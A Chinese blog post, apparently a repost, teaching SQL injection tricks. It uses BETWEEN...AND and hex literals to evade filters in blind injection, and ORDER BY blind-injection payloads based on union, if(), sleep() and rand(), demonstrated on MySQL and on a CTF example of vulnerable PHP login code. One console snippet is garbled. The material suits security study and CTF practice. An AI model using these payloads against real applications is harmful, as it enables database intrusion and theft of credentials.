内容简介:最近发现了两个关于sql注入的小trick,分享一下.操作符 BETWEEN … AND 会选取介于两个值之间的数据范围。这些值可以是数值、文本或者日期。
最近发现了两个关于 sql 注入的小trick,分享一下.
between and 操作符代替比较符
操作符 BETWEEN … AND 会选取介于两个值之间的数据范围。这些值可以是数值、文本或者日期。
between and
有数据比较功能
exp1 between min and max 如果exp1的结果处于min和max之间,`between and`就返回`1`,反之返回`0`.
示例
mysql> select * from user; +----+----------+----------------------------------+-------------------+ | id | username | password | email | +----+----------+----------------------------------+-------------------+ | 1 | a | 0cc175b9c0f1b6a831c399e269772661 | 456456664@qq.com | | 2 | aa | 4124bc0a9335c27f086f24ba207a4912 | 456456664@qq.com | | 3 | admin | 26fff50e6f9c6ca38e181c65c1531eca | 456456664@qq.com | | 4 | add | 0cc175b9c0f1b6a831c399e269772661 | 456456664@qq.com | +----+----------+----------------------------------+-------------------+ mysql> select * from user where id between 1 and 2; +----+----------+----------------------------------+-------------------+ | id | username | password | email | +----+----------+----------------------------------+-------------------+ | 1 | a | 0cc175b9c0f1b6a831c399e269772661 | 456456664@qq.com | | 2 | aa | 4124bc0a9335c27f086f24ba207a4912 | 456456664@qq.com | +----+----------+----------------------------------+-------------------+
大多数数据库都支持 between and
操作,但是对于边界的处理有所不同,在 mysql 中, between and
是包含边界的,在数学中也就是 [min,max]
在盲注中应用
between and
可以用来在过滤了 =
, like
, regexp
, >
, <
的情况下使用.
mysql> select database(); +------------+ | database() | +------------+ | test | +------------+ 1 row in set (0.00 sec)
1. 配合截取函数使用
mysql> select mid(database(),1,1) between 'a' and 'a' ; +-----------------------------------------+ | mid(database(),1,1) between 'a' and 'a' | +-----------------------------------------+ | 0 | +-----------------------------------------+ 1 row in set (0.00 sec) mysql> select mid(database(),1,1) between 't' and 't' ; +-----------------------------------------+ | mid(database(),1,1) between 't' and 't' | +-----------------------------------------+ | 1 | +-----------------------------------------+ 1 row in set (0.00 sec)
2. 截取函数被过滤
表达式
select exp between min and max
在截取字符函数被过滤的时候,设置 min
和 max
的方式有所改变.
测试1
mysql> select 'b' between 'a' and 'c'; +-------------------------+ | 'b' between 'a' and 'c' | +-------------------------+ | 1 | +-------------------------+ 1 row in set (0.00 sec) mysql> select 'b' between 'a' and 'b'; +-------------------------+ | 'b' between 'a' and 'b' | +-------------------------+ | 1 | +-------------------------+ 1 row in set (0.00 sec) mysql> select 'b' between 'b' and 'c'; +-------------------------+ | 'b' between 'b' and 'c' | +-------------------------+ | 1 | +-------------------------+ 1 row in set (0.00 sec)
测试2
mysql> select 'bcd' between 'a' and 'c'; +---------------------------+ | 'bcd' between 'a' and 'c' | +---------------------------+ | 1 | +---------------------------+ 1 row in set (0.00 sec) mysql> select 'bcd' between 'a' and 'b'; +---------------------------+ | 'bcd' between 'a' and 'b' | +---------------------------+ | 0 | +---------------------------+ 1 row in set (0.00 sec) mysql> select 'bcd' between 'b' and 'c'; +---------------------------+ | 'bcd' between 'b' and 'c' | +---------------------------+ | 1 | +---------------------------+ 1 row in set (0.00 sec)
由测试可知,当 exp
为单个字符时三种区间返回值都是 1
,但是当 exp
为字符串时,当区间为 a-b
时,返回值为 0
.区间为 a-c
或者 b-c
时,返回值为 1
.
也就是在进行字符串比较时,只会包含一边的值,也就是 [b,c)
.
所以在实际利用时,就要注意区间的范围.
实际测试
mysql> select database() between 'a' and 'z'; +--------------------------------+ | database() between 'a' and 'z' | +--------------------------------+ | 1 | +--------------------------------+ 1 row in set (0.05 sec) ... mysql> select database() between 't' and 'z'; +--------------------------------+ | database() between 't' and 'z' | +--------------------------------+ | 1 | +--------------------------------+ 1 row in set (0.00 sec) mysql> select database() between 'u' and 'z'; +--------------------------------+ | database() between 'u' and 'z' | +--------------------------------+ | 0 | +--------------------------------+ 1 row in set (0.00 sec)
由结果可知,第一个字符为 t
第二个字符
mysql> select database() between 'tatest +----------------------------------+test | database() between 'ta' and 'tz' |test +----------------------------------+ | 1 | +----------------------------------+ 1 row in set (0.00 sec) mysql> select database() between 'te' and 'tz'; +----------------------------------+ | database() between 'te' and 'tz' | +----------------------------------+ | 1 | +----------------------------------+ 1 row in set (0.00 sec) mysql> select database() between 'tf' and 'tz'; +----------------------------------+ | database() between 'tf' and 'tz' | +----------------------------------+ | 0 | +----------------------------------+ 1 row in set (0.00 sec)
剩下的以此类推.最终为 test
.
3. 单引号被过滤
between and
还支持16进制,所以可以用16进制,来绕过单引号的过滤.
测试
mysql> select database() between 0x61 and 0x7a; //select database() between 'a' and 'z'; +----------------------------------+ | database() between 0x61 and 0x7a | +----------------------------------+ | 1 | +----------------------------------+ 1 row in set (0.00 sec) mysql> select database() between 0x74 and 0x7a; //select database() between 't' and 'z'; +----------------------------------+ | database() between 0x74 and 0x7a | +----------------------------------+ | 1 | +----------------------------------+ 1 row in set (0.00 sec) mysql> select database() between 0x75 and 0x7a; //select database() between 'u' and 'z'; +----------------------------------+ | database() between 0x75 and 0x7a | +----------------------------------+ | 0 | +----------------------------------+ 1 row in set (0.00 sec)
了解order by
order by是mysql中对查询数据进行 排序 的方法,
使用示例
select * from 表名 order by 列名(或者数字) asc;升序(默认升序) select * from 表名 order by 列名(或者数字) desc;降序
这里的重点在于order by后既可以填列名或者是一个数字。举个例子:
id是user表的第一列的列名,那么如果想根据id来排序,有两种写法:
select * from user order by id; selecr * from user order by 1;
order by盲注
结合union来盲注
这个是在安恒杯月赛上看到的。
后台关键代码
$sql = 'select * from admin where username='".$username."''; $result = mysql_query($sql); $row = mysql_fetch_array($result); if(isset($row)&&row['username']!="admin"){ $hit="username error!"; }else{ if ($row['password'] === $password){ $hit=""; }else{ $hit="password error!"; } }
payload
username=admin' union 1,2,'字符串' order by 3
sql语句就变为
select * from admin where username='admin' or 1 union select 1,2,binary '字符串' order by 3;
这里就会对第三列进行比较,即将字符串和密码进行比较。然后就可以根据页面返回的不同情况进行盲注。
注意的是最好加上binary,因为order by比较的时候不区分大小写。
基于if()盲注
需要知道列名
order by的列不同,返回的页面当然也是不同的,所以就可以根据排序的列不同来盲注。
示例:
order by if(1=1,id,username);
这里如果使用数字代替列名是不行的,因为if语句返回的是字符类型,不是整型。
不需要知道列名
payload
order by if(表达式,1,(select id from information_schema.tables))
如果表达式为false时,sql语句会报ERROR 1242 (21000): Subquery returns more than 1 row的错误,导致查询内容为空,如果表达式为true是,则会返回正常的页面。
基于时间的盲注
payload
order by if(1=1,1,sleep(1))
测试结果
select * from ha order by if(1=1,1,sleep(1)); #正常时间 select * from ha order by if(1=2,1,sleep(1)); #有延迟
测试的时候发现延迟的时间并不是sleep(1)中的1秒,而是大于1秒。
最后发现延迟的时间和所查询的数据的条数是成倍数关系的。
计算公式:
延迟时间=sleep(1)的秒数*所查询数据条数
我所测试的ha表中有五条数据,所以延迟了5秒。如果查询的数据很多时,延迟的时间就会很长了。
在写脚本时,可以添加timeout这一参数来避免延迟时间过长这一情况。
基于rang()的盲注
原理不赘述了,直接看测试结果
mysql> select * from ha order by rand(true); +----+------+ | id | name | +----+------+ | 9 | NULL | | 6 | NULL | | 5 | NULL | | 1 | dss | | 0 | dasd | +----+------+ mysql> select * from ha order by rand(false); +----+------+ | id | name | +----+------+ | 1 | dss | | 6 | NULL | | 0 | dasd | | 5 | NULL | | 9 | NULL | +----+------+
可以看到当rang()为true和false时,排序结果是不同的,所以就可以使用rang()函数进行盲注了。
例
order by rand(ascii(mid((select database()),1,1))>96)
后记
order by
注入在crf里其实出现挺多了,一直没有总结过.这次比较全的整理了一下(自认为比较全.XD),就和 between and
一起发出来了.欢迎师傅交流学习.
以上所述就是小编给大家介绍的《SQL注入的两个小Trick与总结》,希望对大家有所帮助,如果大家有任何疑问请给我留言,小编会及时回复大家的。在此也非常感谢大家对 码农网 的支持!
猜你喜欢:- 如何在Hibernate/JPA中配置具有两个连接池的两个数据源
- 如何合并两个 TensorFlow 模型
- 关于sqlmap的两个小坑
- JS计算两个时间间隔
- 昨天 GitHub 挂了两个小时
- Openstack两个容易混淆的概念
本站部分资源来源于网络,本站转载出于传递更多信息之目的,版权归原作者或者来源机构所有,如转载稿涉及版权问题,请联系我们。
Test Driven Development
Kent Beck / Addison-Wesley Professional / 2002-11-18 / USD 49.99
Quite simply, test-driven development is meant to eliminate fear in application development. While some fear is healthy (often viewed as a conscience that tells programmers to "be careful!"), the auth......一起来看看 《Test Driven Development》 这本书的介绍吧!